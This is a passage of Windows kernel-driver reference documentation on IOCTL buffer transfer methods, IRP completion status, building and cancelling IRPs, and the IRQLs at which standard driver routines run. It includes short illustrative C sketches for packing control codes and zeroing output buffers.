  • METHOD_OUT_DIRECT
  • METHOD_IN_DIRECT
  • METHOD_NEITHER
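
As an illustration of how the Method field is carried inside the 32-bit control code, the following user-mode sketch packs and unpacks a code using the same bit layout as the WDK CTL_CODE macro. The toy_ names are hypothetical and are used here only to avoid clashing with the real header definitions; the numeric method values match those in the WDK headers.

```c
#include <assert.h>
#include <stdint.h>

/* Transfer-method values, numerically equal to the WDK definitions. */
enum {
    TOY_METHOD_BUFFERED   = 0,
    TOY_METHOD_IN_DIRECT  = 1,
    TOY_METHOD_OUT_DIRECT = 2,
    TOY_METHOD_NEITHER    = 3
};

/* Same layout as CTL_CODE: device type in bits 16-31, required access
 * in bits 14-15, function number in bits 2-13, method in bits 0-1. */
uint32_t toy_ctl_code(uint32_t device_type, uint32_t function,
                      uint32_t method, uint32_t access)
{
    assert(method <= 3u && access <= 3u && function <= 0xFFFu);
    return (device_type << 16) | (access << 14) | (function << 2) | method;
}

/* The transfer method is the low two bits of the control code. */
uint32_t toy_method_from_code(uint32_t code)
{
    return code & 3u;
}

/* The function number occupies the next twelve bits. */
uint32_t toy_function_from_code(uint32_t code)
{
    return (code >> 2) & 0xFFFu;
}
```

For example, device type 0x22 with function 0x800, TOY_METHOD_OUT_DIRECT, and access 0 yields the code 0x00222002, from which toy_method_from_code recovers the value 2.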

METHOD_BUFFERED IOCTLs

In a METHOD_BUFFERED IOCTL, like a buffered read or write request, data transfer is performed through a copy of the user’s buffer passed in the Irp->AssociatedIrp.SystemBuffer field. The lengths of the input and output buffers are passed in the driver’s IO_STACK_LOCATION structure in the Parameters.DeviceIoControl.InputBufferLength field, and the Parameters.DeviceIoControl.OutputBufferLength field. These values represent the maximum number of bytes the driver should read or write in response to the buffered IOCTL.

METHOD_BUFFERED IOCTLs are the most secure IOCTLs, because the buffer pointer is guaranteed to be valid and aligned on a natural processor boundary, and the data in the buffer cannot change.

The I/O Manager does not zero-initialize the output buffer before issuing the request. The driver is responsible for writing either valid data or zeroes in the output buffer, up to the return byte count it specifies in the Irp->IoStatus.Information field. Failing to write valid data or zeroes could result in returning private kernel data to the user-mode application. Because this data could belong to another user, this error is considered a breach of system security.
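
One common way to satisfy this requirement is to zero the portion of the buffer that will be reported before writing any valid data into it. The following user-mode sketch shows the idea for a hypothetical fixed-size 16-byte reply; toy_build_reply, TOY_REPLY_LEN, and the reply format are assumptions made for illustration and do not come from any real driver.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define TOY_REPLY_LEN 16   /* hypothetical fixed reply size, in bytes */

/* Build a reply in the output buffer and return the byte count that a
 * driver would report as the number of bytes returned. Every byte that
 * is reported is either valid data or zero, never stale memory. */
size_t toy_build_reply(unsigned char *out, size_t out_len, const char *name)
{
    assert(out != NULL && name != NULL);
    if (out_len < TOY_REPLY_LEN) {
        return 0;                      /* too small: report no bytes */
    }
    memset(out, 0, TOY_REPLY_LEN);     /* clear everything we will report */
    size_t n = strlen(name);
    if (n > TOY_REPLY_LEN - 1) {
        n = TOY_REPLY_LEN - 1;         /* keep a terminating zero */
    }
    memcpy(out, name, n);              /* then write the valid data */
    return TOY_REPLY_LEN;
}
```

Bytes beyond the reported count are left untouched in this sketch, because only the reported range is copied back to the caller.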

METHOD_OUT_DIRECT IOCTLs

An IOCTL that specifies METHOD_OUT_DIRECT or METHOD_DIRECT_FROM_HARDWARE represents a read operation from the hardware. METHOD_OUT_DIRECT and METHOD_DIRECT_FROM_HARDWARE can be used interchangeably.

In METHOD_OUT_DIRECT requests, the Irp->AssociatedIrp.SystemBuffer field contains a kernel-mode copy of the requestor’s input buffer. The Irp->MdlAddress field contains an MDL that describes the requestor’s output buffer. The I/O Manager readies this buffer for the driver to write. As in read and write operations, the driver must call the MmGetSystemAddressForMdlSafe macro to get a kernel-mode pointer to the buffer described by the MDL.

The requestor’s input buffer typically contains a pointer to a command that the driver should interpret or send to the device. The requestor’s output buffer typically is the location to which the driver should transfer the result of the operation.

METHOD_IN_DIRECT IOCTLs

An IOCTL that specifies METHOD_IN_DIRECT or METHOD_DIRECT_TO_HARDWARE requests a write operation to the hardware. METHOD_DIRECT_TO_HARDWARE and METHOD_IN_DIRECT can be used interchangeably.

In METHOD_IN_DIRECT requests, the Irp->AssociatedIrp.SystemBuffer field contains a kernel-mode copy of the requestor’s input buffer. The Irp->MdlAddress field contains an MDL that describes the requestor’s output buffer. The I/O Manager readies this buffer for the driver to read. As in read and write operations, the driver must call the MmGetSystemAddressForMdlSafe macro to get a kernel-mode pointer to the buffer described by the MDL.

The input and output buffers are typically used in similar ways for METHOD_OUT_DIRECT and METHOD_IN_DIRECT IOCTLs. The requestor’s input buffer contains a command for the driver or device. The requestor’s output buffer, however, contains the data for the driver to transfer to the device. In effect, it is a second input buffer.

METHOD_NEITHER IOCTLs

A driver can define IOCTLs that use neither direct nor buffered I/O. METHOD_NEITHER IOCTLs have separate user-mode pointers for input and output buffers:

  • IrpSp->Parameters.DeviceIoControl.Type3InputBuffer points to the input buffer.
  • Irp->UserBuffer points to the output buffer.

The input and output buffer addresses are user-mode pointers. Therefore, drivers must validate these pointers before using them, by calling the ProbeForRead and ProbeForWrite routines within a try/except block. In addition, the driver must copy all parameters to kernel-mode memory (either in the pool or on the stack) before validating them.

Note   For detailed information on probing and on problems commonly seen in driver I/O paths, see Common Driver Reliability Issues.

Success, Error, and Warning Status for IRP Completion

When a driver completes an IRP with a success or warning status, the I/O Manager:

  • Copies the data from the buffer specified in the IRP back to the user’s buffer, if the IRP specified METHOD_BUFFERED I/O. The driver specifies the number of bytes to be copied in the Irp->IoStatus.Information field.
  • Copies the results from the IRP’s status block (Irp->IoStatus.Status and Irp->IoStatus.Information) to the caller’s original request block.
  • Signals the event specified by the caller that initiated the request.

Not all of these actions occur in all cases. For example, if a driver completes an IRP with an error status, the I/O Manager does not copy any data back to the user’s buffer, and it copies only the value of the Irp->IoStatus.Status field, not the value of the IoStatus.Information field. If a driver completes an IRP synchronously, the I/O Manager does not signal the event. If a driver completes an IRP asynchronously, the I/O Manager might or might not signal the event. Therefore, a driver that calls ZwReadFile, ZwDeviceIoControl, or similar ZwXxx routines should wait on the event only if the ZwXxx routine returns STATUS_PENDING.

The following values indicate error and warning status codes:

  • NTSTATUS codes 0xC0000000 through 0xFFFFFFFF are errors.
  • NTSTATUS codes 0x80000000 through 0xBFFFFFFF are warnings.

If the value of the Irp->IoStatus.Status field is an error code, the operating system does not return any data, so the contents of the Irp->IoStatus.Information field should always be zero. If the value of the Irp->IoStatus.Status field is a warning code, the operating system can return data, so the contents of the Irp->IoStatus.Information field can be nonzero.

A simple scenario can help explain this situation. Assume that an IRP requires a driver to return data in a buffer that is defined with the following two fields.

ULONG Length;
UCHAR Data [];  // Variable length array

The Length field specifies the size required to retrieve the data. The application sends a ULONG request to get the Length, and then sends a second request with a bigger buffer to retrieve all the data. The driver, in turn, always expects the buffer to be at least the size of a ULONG data item.

If the buffer is large enough, the driver completes the IRP with STATUS_SUCCESS, and Length and Irp->IoStatus.Information receive the number of bytes transferred.

If the buffer is not large enough to hold the data, the driver completes the IRP with the warning STATUS_BUFFER_OVERFLOW. In this case, the data is too large for the buffer. The driver updates the Length with the size required, and writes sizeof(ULONG) into Irp->IoStatus.Information.

If the buffer is too small to write the required length (that is, the buffer is smaller than sizeof(ULONG)), the driver completes the IRP with the error STATUS_BUFFER_TOO_SMALL and sets Irp->IoStatus.Information to 0.

Building IRPs

Drivers can create two types of IRPs:

  • Threaded IRPs, also called synchronous requests.
  • Nonthreaded IRPs, also called asynchronous requests.

Threaded IRPs

Threaded IRPs are bound to the current thread of execution when they are created. When the thread terminates, any threaded IRPs associated with it are automatically cancelled.

Drivers create threaded IRPs by calling one of the following routines:

  • IoBuildSynchronousFsdRequest
  • IoBuildDeviceIoControlRequest

IoBuildSynchronousFsdRequest allocates and builds a threaded IRP for a read or write request. IoBuildDeviceIoControlRequest allocates and builds a threaded IRP to send an IOCTL.

When creating a threaded IRP, a driver specifies an event to signal when the IRP is complete and provides pointers to the buffers in which to return the requested data. When every sub-request in the IRP is complete (that is, when all the required drivers have completed the IRP), the entire request is complete. The I/O Manager then performs post-processing as follows:

  • Copies kernel-mode data to user-mode buffers to be returned to the caller. For example, ZwReadFile, IoBuildDeviceIoControlRequest, and similar system support routines pass user-mode buffers.
  • Signals the event, if the response is asynchronous. If the IoCallDriver routine returns STATUS_PENDING, the caller should wait on the event.
  • Copies the value of the Irp->IoStatus.Status field to the Irp->UserIosb.Status field of the user I/O status block, if the response is asynchronous. If IoCallDriver returns STATUS_PENDING, the caller can read this field after the event is signaled.
  • Copies the value of the Irp->IoStatus.Information field to the Irp->UserIosb.Information field of the user I/O status block, if the response is asynchronous and the I/O request succeeded. If IoCallDriver returns STATUS_PENDING, the caller can read this field after the event is signaled. If the request returns an error status, the I/O Manager does not transfer any data to the user buffers, so the caller should treat the value at Irp->UserIosb.Information as zero; some driver writers might prefer to zero-initialize the field as an added precaution.
  • Frees the IRP.

Nonthreaded IRPs

Nonthreaded IRPs are not associated with any thread. The driver that initiates a nonthreaded IRP must set a completion routine to "catch" the IRP when it is complete. The I/O Manager does not free nonthreaded IRPs; the driver that initiated the IRP must free it. Nonthreaded IRPs are intended for driver-to-driver communication.

Drivers create nonthreaded IRPs by calling one of the following routines:

  • IoBuildAsynchronousFsdRequest
  • IoAllocateIrp

IoBuildAsynchronousFsdRequest allocates and builds a nonthreaded IRP for a read or write request. IoAllocateIrp allocates an IRP for a driver to send to lower drivers in the same device stack or to another device stack.

IRP Cancellation

IRPs can be cancelled (sometimes described as "recalled"). When an IRP is cancelled, the driver that currently owns the IRP must complete it immediately.

A driver that requires special processing to cancel an IRP must either:

  • Supply an IoCancel routine to be notified when cancellation occurs, and test the Cancel flag in the IRP at various times during processing to determine whether the IRP has been cancelled.
  • Use the new cancel-safe IRP queuing routines (IoCsqXxx).

IRP cancellation can be difficult to code correctly, because cancellation is inherently asynchronous and race conditions can occur at numerous points. The cancel-safe IRP queues greatly simplify cancellation logic, and are strongly recommended for all new drivers. IRP cancellation is covered in the Microsoft Windows Driver Development Kit (DDK) and in Cancel Logic in Windows Drivers.

Debugging I/O Problems

Driver writers can use the Driver Verifier and extensions to the Microsoft debuggers to debug problems in handling IRPs.

Driver Verifier can catch errors in every aspect of IRP handling. It is provided with every version of the operating system, and runs best with a debugger attached. However, Driver Verifier can detect errors only in code that actually runs, so driver writers must still provide and use test tools that exercise their driver. Use of the Driver Verifier and driver-specific test tools should be a standard part of debugging and development.

The !irp and !irpfind debugger extensions can help in tracing IRPs while debugging. The !irp extension displays detailed information about a specified IRP, and the !irpfind extension displays information about all IRPs in the system, or about one or more IRPs that meet specified criteria. For detailed information about these extensions, see the documentation in the Debugging Tools for Windows package.

Call to Action and Resources

Call to action for driver developers:

  • Return STATUS_CONTINUE_COMPLETION or STATUS_MORE_PROCESSING_REQUIRED from all IoCompletion routines.
  • Understand when to return STATUS_PENDING for an IRP. Return STATUS_PENDING only if you have called the IoMarkIrpPending macro for the IRP, and conversely, call IoMarkIrpPending for an IRP only if you will return STATUS_PENDING.
  • Test the value of the Irp->PendingReturned flag in IoCompletion routines to optimize post-processing of IRPs.
  • Understand the difference between error status and warning status, and what data the IRP contains for each type of status.
  • Use Driver Verifier to catch errors in IRP handling, and use debugger extensions to understand how individual IRPs are processed.

Resources:

November 4, 2005
 
Kernel-Mode Driver Architecture: Windows DDK

Managing Hardware Priorities

The IRQL at which a driver routine executes determines which kernel-mode driver support routines it can call. For example, some driver support routines require that the caller be running at IRQL DISPATCH_LEVEL. Others cannot be called safely if the caller is running any raised IRQL; that is, at any IRQL higher than PASSIVE_LEVEL.

Following is a list of IRQLs at which the most commonly implemented standard driver routines are called. The IRQLs are listed from lowest to highest priority.

PASSIVE_LEVEL

Interrupts Masked Off: None.

Driver Routines Called at PASSIVE_LEVEL: DriverEntry, AddDevice, Reinitialize, Unload routines, most dispatch routines, driver-created threads, worker-thread callbacks.

APC_LEVEL

Interrupts Masked Off: APC_LEVEL interrupts are masked off.

Driver Routines Called at APC_LEVEL: Some dispatch routines (see Dispatch Routines and IRQLs).

DISPATCH_LEVEL

Interrupts Masked Off: DISPATCH_LEVEL and APC_LEVEL interrupts are masked off. Device, clock, and power failure interrupts can occur.

Driver Routines Called at DISPATCH_LEVEL: StartIo, AdapterControl, AdapterListControl, ControllerControl, IoTimer, Cancel (while holding the cancel spin lock), DpcForIsr, CustomTimerDpc, CustomDpc routines.

DIRQL

Interrupts Masked Off: All interrupts at IRQL <= DIRQL of the driver’s interrupt object. Device interrupts with a higher DIRQL value can occur, along with clock and power failure interrupts.

Driver Routines Called at DIRQL: InterruptService, SynchCritSection routines.

The only difference between APC_LEVEL and PASSIVE_LEVEL is that a process executing at APC_LEVEL cannot get APC interrupts. But both IRQLs imply a thread context and both imply that the code can be paged out.

Lowest-level drivers process IRPs while running at one of three IRQLs:

  • PASSIVE_LEVEL, with no interrupts masked off on the processor, in the driver’s Dispatch routine(s)

    DriverEntry, AddDevice, Reinitialize, and Unload routines also are run at PASSIVE_LEVEL, as are any driver-created system threads.

  • DISPATCH_LEVEL, with DISPATCH_LEVEL and APC_LEVEL interrupts masked off on the processor, in the StartIo routine

    AdapterControl, AdapterListControl, ControllerControl, IoTimer, Cancel (while it holds the cancel spin lock), and CustomTimerDpc routines also are run at DISPATCH_LEVEL, as are DpcForIsr and CustomDpc routines.

  • Device IRQL (DIRQL), with all interrupts at less than or equal to the SynchronizeIrql of the driver’s interrupt object(s) masked off on the processor, in the ISR and SynchCritSection routines

Most higher-level drivers process IRPs while running at either of two IRQLs:

  • PASSIVE_LEVEL, with no interrupts masked off on the processor, in the driver’s dispatch routines

    DriverEntry, Reinitialize, AddDevice, and Unload routines also are run at PASSIVE_LEVEL, as are any driver-created system threads, worker-thread callback routines, and file system drivers.

  • DISPATCH_LEVEL, with DISPATCH_LEVEL and APC_LEVEL interrupts masked off on the processor, in the driver’s IoCompletion routine(s)

    IoTimer, Cancel, and CustomTimerDpc routines also are run at DISPATCH_LEVEL.

In some circumstances, intermediate and lowest-level drivers of mass-storage devices are called at IRQL APC_LEVEL. In particular, this can occur at a page fault for which a file system driver sends an IRP_MJ_READ request to lower drivers.

Most standard driver routines are run at an IRQL that allows them simply to call the appropriate support routines. For example, a device driver must call AllocateAdapterChannel while running at IRQL DISPATCH_LEVEL. Since most device drivers call these routines from a StartIo routine, usually they are running at DISPATCH_LEVEL already.

Note that a device driver that has no StartIo routine because it sets up and manages its own queues of IRPs is not necessarily running at DISPATCH_LEVEL IRQL when it should call AllocateAdapterChannel. Such a driver must nest its call to AllocateAdapterChannel between calls to KeRaiseIrql and KeLowerIrql so that it runs at the required IRQL when it calls AllocateAdapterChannel and restores the original IRQL when the calling routine regains control.

When calling driver support routines, be aware of the following.

  • Calling KeRaiseIrql with an input NewIrql value that is less than the current IRQL causes a fatal error. Calling KeLowerIrql except to restore the original IRQL (that is, after a call to KeRaiseIrql) also causes a fatal error.
  • While running at raised IRQL, calling KeWaitForSingleObject or KeWaitForMultipleObjects for kernel-defined dispatcher objects to wait for a nonzero interval causes a fatal error.
  • The only driver routines that can safely wait on events, semaphores, mutexes, or timers are those that run in a nonarbitrary thread context at IRQL PASSIVE_LEVEL, such as driver-created threads, the DriverEntry and Reinitialize routines, or dispatch routines for inherently synchronous I/O operations (such as most device I/O control requests).
  • Even while running at IRQL PASSIVE_LEVEL, pageable driver code must not call KeSetEvent, KeReleaseSemaphore, or KeReleaseMutex with the input Wait parameter set to TRUE. Such a call can cause a fatal page fault.
  • Any routine that is running at greater than IRQL APC_LEVEL can neither allocate memory from paged pool nor access memory in paged pool safely. If a routine running at IRQL greater than APC_LEVEL causes a page fault, it is a fatal error.
  • A driver must be running at IRQL DISPATCH_LEVEL when it calls KeAcquireSpinLockAtDpcLevel and KeReleaseSpinLockFromDpcLevel.

    A driver can be running at IRQL <= DISPATCH_LEVEL when it calls KeAcquireSpinLock but it must release that spin lock by calling KeReleaseSpinLock. In other words, it is a programming error to release a spin lock acquired with KeAcquireSpinLock by calling KeReleaseSpinLockFromDpcLevel.

    A driver must not call KeAcquireSpinLockAtDpcLevel, KeReleaseSpinLockFromDpcLevel, KeAcquireSpinLock, or KeReleaseSpinLock while running at IRQL > DISPATCH_LEVEL.

  • Calling a support routine that uses a spin lock, such as an ExInterlockedXxx routine, raises IRQL on the current processor either to DISPATCH_LEVEL or to DIRQL if the caller is not already running at raised IRQL.
  • Driver code that runs at raised IRQL should execute as quickly as possible. The higher the IRQL at which a routine runs, the more important it is for good overall performance to tune that routine to execute as quickly as possible. For example, any driver that calls KeRaiseIrql should make the reciprocal call to KeLowerIrql as soon as it can.